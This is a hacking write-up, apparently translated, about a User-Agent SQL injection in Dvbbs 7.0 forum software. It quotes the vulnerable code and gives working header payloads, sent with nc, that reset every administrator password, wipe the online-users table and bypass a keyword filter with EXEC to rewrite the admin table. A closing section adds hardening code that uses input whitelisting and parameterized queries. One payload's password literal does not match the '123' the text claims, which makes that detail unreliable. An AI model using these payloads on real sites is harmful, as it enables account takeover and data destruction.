Last time, the avatar-upload vulnerability in the Dvbbs (Dongwang) forum caused the DVBBS forum sites a great deal of pain, and the fix for it only arrived with the SP2 version. Solving that problem may well have exhausted the beach kid. But is it really safe now? The answer is no: this time the trouble lies in the HTTP_USER_AGENT variable. If you want to know more, listen to me slowly.

Vulnerable file: inc/dv_clsmain.asp
Test environment: Dvbbs 7.0.0 MSSQL, Dvbbs 7.0.0 SP1 MSSQL, Dvbbs 7.0.0 SP2 MSSQL
Server OS: Windows 2000 Advanced Server

An injection vulnerability caused by weak filtering of the HTTP_USER_AGENT variable was once found in Dvbbs 6.x, so I assumed that this time, in DVBBS 7.0, the variable would be filtered properly. After reading the code I found that my assumption was wrong: with a cleverly constructed value, you can carry out an injection against any forum that runs on the MSSQL database. Let us first take a look at the vulnerable code.
DVBBS 7.0.0 and DVBBS 7.0.0 SP1, file Inc/Dv_ClsMain.asp, lines 1745-1755:

    Agent = Request.ServerVariables("HTTP_USER_AGENT")
    Agent = Split(Agent, ";")
    If InStr(Agent(1), "MSIE") > 0 Then
        Browser = "Microsoft Internet Explorer"
        Version = Trim(Replace(Agent(1), "MSIE", "", 6))
    ElseIf InStr(Agent(4), "Netscape") > 0 Then
        Browser = "Netscape"
        Dim TmpStr
        TmpStr = Split(Agent(4), "/")
        Version = TmpStr(UBound(TmpStr))
    End If

DVBBS 7.0.0 SP2, file Inc/Dv_ClsMain.asp, lines 1919-1938:

    Agent = Request.ServerVariables("HTTP_USER_AGENT")
    'Agent = "Opera/7.23 (X11; Linux i686; U) [en]"
    If Left(Agent, 7) = "Mozilla" Then    'the browser identifies itself as Mozilla
        Agent = Split(Agent, ";")
        If InStr(Agent(1), "MSIE") > 0 Then
            Browser = "Microsoft Internet Explorer"
            Version = Trim(Replace(Agent(1), "MSIE", "", 6))
        ElseIf InStr(Agent(4), "Netscape") > 0 Then
            Browser = "Netscape"
            TmpStr = Split(Agent(4), "/")
            Version = TmpStr(UBound(TmpStr))
        ElseIf InStr(Agent(4), "rv:") > 0 Then
            Browser = "Mozilla"
            TmpStr = Split(Agent(4), ":")
            Version = TmpStr(UBound(TmpStr))
            If InStr(Version, ")") > 0 Then
                TmpStr = Split(Version, ")")
                Version = TmpStr(0)
            End If
        End If
    End If

These two segments belong to the class Cls_Browser, which determines the user's browser type and version. Both have the same problem: when the agent string contains "Netscape", the text after the last "/" is handed straight to the Version variable without any check. But what can that do for us? Keep reading.
Part of the UserActiveOnline function in the same file (the same in all three versions) reads:

    Dim StatUserID
    StatUserID = Session(CacheName & "UserID")(0)
    SQL = "SELECT ID, BoardID FROM [Dv_Online] WHERE ID=" & CCur(StatUserID)
    Set Rs = Execute(SQL)
    If Rs.EOF And Rs.BOF Then
        If CInt(Forum_Setting(36)) = 0 Then
            ActCome = ""
        Else
            ActCome = Address(UIP)
        End If
        Set BrowserType = New Cls_Browser
        SQL = "INSERT INTO [Dv_Online] (ID, UserName, UserClass, IP, StarTime, LasTimeBk, BoardID, " & _
              "Browser, Stats, UserGroupID, ActCome, UserHidden) VALUES (" & StatUserID & _
              ", 'Guest', 'Guest', '" & UserTrueIP & "', " & SqlNowString & ", " & SqlNowString & _
              ", " & BoardID & ", '" & BrowserType.Platform & "|" & BrowserType.Browser & _
              BrowserType.Version & "', '" & Replace(Left(Stats, 250), "'", "''") & _
              "', 7, '" & ActCome & "', " & UserHidden & ")"
        'update the cached online total
        MyBoardOnline.Forum_Online = MyBoardOnline.Forum_Online + 1
        Name = "Forum_Online"
        Value = MyBoardOnline.Forum_Online
        Set BrowserType = Nothing
    Else
        SQL = "UPDATE [Dv_Online] SET LasTimeBk=" & SqlNowString & ", BoardID=" & BoardID & _
              ", Stats='" & Replace(Stats, "'", "''") & "' WHERE ID=" & CCur(StatUserID)
    End If
    Set Rs = Nothing
    Execute(SQL)

Obviously, once the Version value has been obtained it is concatenated directly into the SQL string and the statement is sent to the database for execution.
The statement filtering in the Execute function is:

    If InStr(LCase(Command), "dv_admin") > 0 And Left(ScriptName, 6) <> "admin_" Then
        Response.Write SaveSqlLog(Command, "...")    'second argument is illegible in the source
        Command = Replace(LCase(Command), "dv_admin", "dv" & Chr(95) & "<i>admin")
    End If

So as long as our statement contains no DV_ADMIN keyword it passes through smoothly. The idea is clear, but the anti-refresh mechanism of the Dvbbs forum makes exploiting the vulnerability much harder. There is still a way; let me go step by step through how I tested this vulnerability. Take the Dv_ClsMain.asp file of SP1 as the example. In the ActiveOnline function the statement

    If DateDiff("s", ReflashPageLastTime, Now()) < 120 And LastVisiBoardID = BoardID Then Exit Sub

is the key to the anti-refresh mechanism; to get it out of the way for the test, comment it out. Then use WSE to capture the MIME data when accessing index.asp. The data obtained is:

    GET /index.asp HTTP/1.1
    Accept: */*
    Accept-Language: en-cn
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.1.4322)
    Host: www.somesite.com
    Connection: Keep-Alive
    Cookie: dnetpubtemp=statuserid=2110913640; ASPSESSIONIDCQCBBSCQ=DMLBHJAAJFOFCLFLENCDEPGG

The User-Agent value here corresponds to Request.ServerVariables("HTTP_USER_AGENT") in the code, so any modification of the database can only be achieved by constructing the User-Agent as a SQL statement. Since the DV_ADMIN keyword is filtered in the Execute function, we first modify the front-desk administrator's password. Change the User-Agent value to

    Mozilla/4.0 (Compatible; M; M; ','Hacker',7,'',2) Update DV_USER SET UserPassword='123' Where usergroupid=1--Netscape

and send it with NC, as shown in the figure.
After NC runs, all the front-desk administrator passwords turn out to have been changed to 123. At the same time the record with ID=2110913640 is written into the Dv_Online table exactly as we expected, with Browser='Unknown|Netscape ' and Stats='Hacker'. So the injection is fully achieved by constructing the value of the User-Agent.

Dealing with the anti-refresh mechanism again: the key anti-refresh statement was only commented out for the test, so now it goes back. That leaves us a very awkward problem. Our access writes a record into the Dv_Online table, and as long as that record exists the code never reaches the INSERT statement we want to inject into. Only after another user's visit calls the MyBoardOnline.OnlineQuery procedure, which clears the timed-out access records (including ours), can we deceive it again; otherwise our visit merely updates our own last-access time to the current value and touches no other data. The interval between two deceptions is 20 minutes! If you wanted to write a Trojan into the database this way you would wait until your hair turned white. You may say: I am on dial-up, why not just re-dial? Of course you can, even though that is painful for us. To solve this tricky problem we can delete all records in the Dv_Online table at the same time as modifying the database, so the injection can go on continuously. The adjusted User-Agent value is:

    Mozilla/4.0 (compatible; m; m; m; ','Hacker',7,'',2) update dv_user set userpassword='123' where usergroupid=1 delete from Dv_Online--Netscape

Believe it or not, no matter how many user access records are in the database, as long as this succeeds all the front-desk administrator passwords are modified and all user access records are removed as well. Clean.
Haha, now we can do as we please, as long as the database user has sufficient permissions. Wait a minute: if the user does not have sufficient permissions, all we can do is modify the front-desk administrator's password. Is the background administrator really out of reach? Don't worry, read on.

Breaking through the Execute filtering: because the DV_ADMIN keyword is filtered in the Execute function, we avoided it in the SQL query statement. But we cannot simply give up on injecting into the Dv_Admin table. Later, inspired by the "SQL Injection White Paper", I used EXEC to solve the problem. If the User-Agent value is modified to

    Mozilla/4.0 (compatible; m; m; m; ','Hacker',7,'',2) Declare @a nvarchar(255) Select @a='update DV_''admin set username=''firstsee'', password='''''' exec(@a)--Netscape

it successfully changes the Username of every record in Dv_Admin to firstsee and the Password to 123.
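The root cause of both the Version injection and the EXEC bypass of the DV_ADMIN keyword filter is the same: user-controlled text is concatenated into the SQL string, so no blacklist on the finished string can be complete. The following is an added example written for this page, not DVBBS code, showing how the Cls_Browser parsing and the Dv_Online INSERT could be hardened: the version is whitelisted to digits and dots, the browser name comes from a fixed set, and the INSERT is sent as a parameterized ADODB.Command so the database never interprets the User-Agent as SQL. It assumes the forum's existing variables (Conn, StatUserID, UserTrueIP, BoardID, Stats, ActCome, UserHidden) are in scope; the Platform column handling from Cls_Browser is left out for brevity, and the "Unknown|" prefix is only illustrative.

```vbscript
' Added example for this page, not DVBBS code. Assumes Conn is an open
' ADODB.Connection and the other forum variables already exist in scope.

' Whitelist the version: only digits and dots following the browser token,
' capped at 20 characters. Quotes, commas and SQL keywords never get through.
Function SafeVersion(Agent, Token)
    Dim Pos, Re, Matches
    Pos = InStr(1, Agent, Token, 1)          ' 1 = vbTextCompare
    If Pos = 0 Then
        SafeVersion = "unknown"
        Exit Function
    End If
    Set Re = New RegExp
    Re.Pattern = "\d+(\.\d+)*"
    Set Matches = Re.Execute(Mid(Agent, Pos + Len(Token)))
    If Matches.Count > 0 Then
        SafeVersion = Left(Matches(0).Value, 20)
    Else
        SafeVersion = "unknown"
    End If
End Function

' Map the User-Agent to one of a fixed set of names instead of echoing it back.
Function SafeBrowserText(Agent)
    If InStr(1, Agent, "MSIE", 1) > 0 Then
        SafeBrowserText = "Microsoft Internet Explorer" & SafeVersion(Agent, "MSIE")
    ElseIf InStr(1, Agent, "Netscape", 1) > 0 Then
        SafeBrowserText = "Netscape" & SafeVersion(Agent, "Netscape/")
    ElseIf InStr(1, Agent, "rv:", 1) > 0 Then
        SafeBrowserText = "Mozilla" & SafeVersion(Agent, "rv:")
    Else
        SafeBrowserText = "Unknown"
    End If
End Function

' Parameterized INSERT: every user-influenced value travels as a bound
' parameter, so a quote or a DELETE inside it cannot alter the statement,
' and the DV_ADMIN keyword filter in Execute is no longer the only defense.
Sub InsertOnlineRow(Conn, StatUserID, UserTrueIP, BoardID, BrowserText, Stats, ActCome, UserHidden)
    Const adCmdText = 1, adExecuteNoRecords = 128
    Const adParamInput = 1, adInteger = 3, adDouble = 5, adVarWChar = 202
    Dim Cmd
    Set Cmd = Server.CreateObject("ADODB.Command")
    Set Cmd.ActiveConnection = Conn
    Cmd.CommandType = adCmdText
    Cmd.CommandText = "INSERT INTO [Dv_Online] (ID, UserName, UserClass, IP, StarTime, LasTimeBk, " & _
                      "BoardID, Browser, Stats, UserGroupID, ActCome, UserHidden) " & _
                      "VALUES (?, 'Guest', 'Guest', ?, GETDATE(), GETDATE(), ?, ?, ?, 7, ?, ?)"
    With Cmd.Parameters
        .Append Cmd.CreateParameter("ID", adDouble, adParamInput, , CDbl(StatUserID))
        .Append Cmd.CreateParameter("IP", adVarWChar, adParamInput, 50, Left(UserTrueIP, 50))
        .Append Cmd.CreateParameter("BoardID", adInteger, adParamInput, , CLng(BoardID))
        .Append Cmd.CreateParameter("Browser", adVarWChar, adParamInput, 255, Left(BrowserText, 255))
        .Append Cmd.CreateParameter("Stats", adVarWChar, adParamInput, 250, Left(Stats, 250))
        .Append Cmd.CreateParameter("ActCome", adVarWChar, adParamInput, 255, Left(ActCome, 255))
        .Append Cmd.CreateParameter("UserHidden", adInteger, adParamInput, , CLng(UserHidden))
    End With
    Cmd.Execute , , adExecuteNoRecords
    Set Cmd = Nothing
End Sub

' Usage at the point where the original UserActiveOnline builds its INSERT.
Dim Agent, BrowserText
Agent = Request.ServerVariables("HTTP_USER_AGENT")
BrowserText = "Unknown|" & SafeBrowserText(Agent)    ' "Unknown|" stands in for the Platform field
InsertOnlineRow Conn, StatUserID, UserTrueIP, BoardID, BrowserText, Stats, ActCome, UserHidden
```

With this shape, a User-Agent carrying quotes or a trailing UPDATE is stored, at most, as an inert "unknown" version string, and the existing keyword check in Execute becomes a logging aid rather than the only thing standing between the request and the Dv_Admin table. Parameter sizes are the ones the page's own code implies (Stats is truncated to 250 characters there); the 50- and 255-character limits for IP and the other text columns are assumptions and should be aligned with the real table definition.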